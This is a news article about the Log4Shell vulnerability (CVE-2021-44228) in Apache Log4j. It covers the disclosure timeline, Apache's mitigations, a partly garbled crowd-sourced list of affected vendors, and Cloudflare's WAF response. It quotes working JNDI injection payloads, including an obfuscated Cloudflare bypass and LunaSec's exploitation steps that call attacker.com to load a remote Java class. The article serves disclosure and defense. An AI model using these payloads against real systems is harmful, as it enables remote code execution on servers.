Security experts and CISA warn users about a newly discovered Zero-day vulnerability, that is currently being exploited. The vulnerability, first discovered in Minecraft, affects systems and services using Java logging library. It affects Apache Log4j between versions 2.0 and 2.14.1 which includes cloud applications. Researchers announced that it is easy to exploit the vulnerability and it allows remote code execution and access to servers.
Started on December 1
Cyber security companies are also investigating the vulnerability. The vulnerability defined as CVE-2021-44228 has a base CVSS score of 10.0 which is a critical level. Cisco Talos published a blog post about the flaw and stated that the activity has begun on December 2. Matthew Prince, CEO of Cloudflare also tweeted about the incident and stated that the earliest evidence they could discover was on December 1. This means it was in the wild for at least 9 days before announced publicly, however the first evidence of mass exploitation happened after public disclosure.
The Apache team also published an advisory about the vulnerability. The developers announced that it is fixed in Log4j 2.15.0 and urged users to install the update. In the latest version, this behavior has been disabled by default. The team also stated that the vulnerability was discovered by Chen Zhaojun of Alibaba Cloud Security Team.
In Apache Log4j2 2.14.1 and older versions, JNDI features, which are used configuration, log messages, and parameters, can’t protect against attacker-controlled LDAP and other JNDI-related endpoints. It allows an unauthorized attacker, who can control log messages or log message parameters, to execute arbitrary code loaded from LDAP servers if message lookup substitution is enabled.
The team also announced that it can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true in releases 2.10 and older. And releases between 2.7 and 2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. For the releases between 2.0-beta9 and 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
Massive risk exposure
The internet community created a list of manufacturers and components impacted by Log4j.
| Manufacturer/Component | Verified |
|---|---|
| Apple | TRUE |
| Tencent | TRUE |
| Steam | TRUE |
| TRUE | |
| Baidu | TRUE |
| DIDI | TRUE |
| JD | TRUE |
| NetEase | TRUE |
| CloudFlare | TRUE |
| Amazon | TRUE |
| Tesla | TRUE |
| Apache Solr | TRUE |
| Apache Druid | TRUE |
| Apache Flink | FALSE |
| Apache Struts2 | TRUE |
| flume | FALSE |
| dubbo | FALSE |
| IBM Qradar SIEM | TRUE |
| PaloAlto Panorama | TRUE |
| Redis | FALSE |
| logstash | FALSE |
| ElasticSearch | TRUE |
| kafka | FALSE |
| ghidra | TRUE |
| ghidra server | TRUE |
| Minecraft | TRUE |
| PulseSecure | TRUE |
| UniFi | TRUE |
| VMWare | TRUE |
| Blender | TRUE |
| TRUE | |
| Webex | TRUE |
| TRUE | |
| VMWarevCenter | TRUE |
| Speed camera LOL | TRUE |
Cloudflare helps users with mitigation
Cloudflare also sent the following email to its users. The company stated that it is using WAF to help Pro and Business customers to help with mitigation. Cloudflare is also deploying mitigation rules to protect free users.
However, a Twitter user published an exploit that bypasses Cloudflare.
Log4j Cloudflare bypass :
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/other WAF : pic.twitter.com/f3Fi7E34TY
— H4x0r-DZ (@h4x0r_dz) December 11, 2021
How to exploit Log4j vulnerability?
Security researchers at LunaSec also published a blog post about the vulnerability. The LunaSec team shared the necessary steps to exploit the vulnerability. These 5 steps are:
- Data from the User gets sent to the server (via any protocol),
- The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server),
- The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via « Java Naming and Directory Interface » (JNDI),
- This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process,
- This injected payload triggers a second stage and allows an attacker to execute arbitrary code.
Is your system vulnerable?
Adil Soybali from Seccops Cyber Security Technologies developed a tool, Log4j RCE Scanner allowing users to scan the URL list provided, including the subdomains of the domain name.
Related Stories
- Two new vulnerabilities are found on Log4j, only one of them is fixed yet
- CISA published an emergency directive for Log4j
- Google joining the war against Log4j exploits
- Hackers exploit Log4j to inject Monero miners, shifting from LDAP to RMI
- A third, new Apache Log4j vulnerability is discovered
- How to scan your server to detect Log4j (Log4Shell) vulnerability
- The Log4j flaw is patched but it is still vulnerable
- CISA published Log4j vulnerability guidance